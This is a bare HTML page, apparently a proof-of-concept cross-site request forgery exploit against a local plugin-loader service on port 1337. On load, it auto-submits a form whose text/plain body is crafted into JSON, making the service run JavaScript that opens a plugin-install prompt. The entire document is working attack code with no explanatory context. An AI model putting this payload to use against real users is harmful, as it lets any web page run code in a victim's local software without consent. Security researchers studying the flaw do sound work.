<form id="F" action="http://127.0.0.1:1337/methods/execute_in_tab" method="post" enctype="text/plain">
    <input name='{"tab":"SP","run_async":false,"code":"DeckyPluginLoader.addPluginInstallPrompt();/*' value='*/"}'>
</form>
<script>
    document.getElementById("F").submit();
</script>
